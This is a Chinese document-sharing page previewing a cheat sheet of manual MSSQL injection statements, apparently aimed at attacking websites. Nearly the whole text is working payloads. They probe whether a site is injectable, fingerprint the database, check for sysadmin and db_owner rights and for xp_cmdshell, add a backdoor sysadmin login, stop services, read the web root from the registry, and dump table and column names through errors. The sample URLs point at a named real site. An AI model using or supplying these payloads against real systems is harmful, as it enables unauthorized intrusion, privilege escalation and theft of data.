返回
网站手工mssql注入常用sql语句整理

网站手工mssql注入常用sql语句整理

ID:19293772

大小:34.50 KB

页数:8页

时间:2018-09-30

网站手工mssql注入常用sql语句整理_第1页
网站手工mssql注入常用sql语句整理_第2页
网站手工mssql注入常用sql语句整理_第3页
网站手工mssql注入常用sql语句整理_第4页
网站手工mssql注入常用sql语句整理_第5页
资源描述:

《网站手工mssql注入常用sql语句整理》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入,以下是收集的一些mssql的sql语句。手工MSSQL注入常用SQL语句andexists(select*fromsysobjects)//判断是否是MSSQLandexists(select*fromtableName)//判断某表是否存在..tableName为表名and1=(select@@VERSION)//MSSQL版本And1=(selectdb_name())//当前数据库名and1=(select@@servern

2、ame)//本地服务名and1=(selectIS_SRVROLEMEMBER(‘sysadmin’))//判断是否是系统管理员and1=(SelectIS_MEMBER(‘db_owner’))//判断是否是库权限and1=(SelectHAS_DBACCESS(‘master’))//判断是否有库读取权限and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=1)//暴库名DBID为1,2,3….;declare@dint//是否支持多行and

3、1=(Selectcount(*)FROMmaster.dbo.sysobjectsWherextype=‘X’ANDname=‘xp_cmdshell’)//判断XP_CMDSHELL是否存在and1=(selectcount(*)FROMmaster.dbo.sysobjectswherename=‘xp_regread’)//查看XP_regread扩展存储过程是不是已经被删除添加和删除一个SA权限的用户test:(需要SA权限)execmaster.dbo.sp_addlogintest,

4、passwordexecmaster.dbo.sp_addsrvrolemembertest,sysadmin停掉或激活某个服务。(需要SA权限)execmaster..xp_servicecontrol‘stop’,’schedule’execmaster..xp_servicecontrol‘start’,’schedule’暴网站目录createtablelabeng(lalanvarchar(255),idint)DECLARE@resultvarchar(255)EXECmaster.d

5、bo.xp_regread‘HKEY_LOCAL_MACHINE’,’SYSTEMControlSet001ServicesW3SVCParametersVirtualRoots’,’/’,@resultoutputinsertintolabeng(lala)values(@result);and1=(selecttop1lalafromlabeng)或者and1=(selectcount(*)fromlabengwherelala>1)—————————————————————————

6、————————————————————————————分割SQLServer判断是否可注射:http://www.exehack.net/article.asp?id=6http://www.exehack.net/article.asp?id=6′http://www.exehack.net/article.asp?id=6and1=1http://www.exehack.net/article.asp?id=6and1=2http://www.exehack.net/article.asp?

7、action=value’and1=1http://www.exehack.net/article.asp?action=value’and1=2searchpoints%’and1=1searchpoints%’and1=2确定数据库类型:http://www.exehack.net/article.asp?id=6anduser>0http://www.exehack.net/article.asp?id=6and(selectcount(*)fromsysobjects)>0查询当前用户数据

8、信息:article.asp?id=6having1=1–暴当前表中的列:article.asp?id=6groupbyadmin.usernamehaving1=1–article.asp?id=6groupbyadmin.username,admin.passwordhaving1=1–暴任意表和列:and(selecttop1namefrom(selecttopNid,namefromsysobjectswherextype=char(85))Torderbyiddesc)>

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。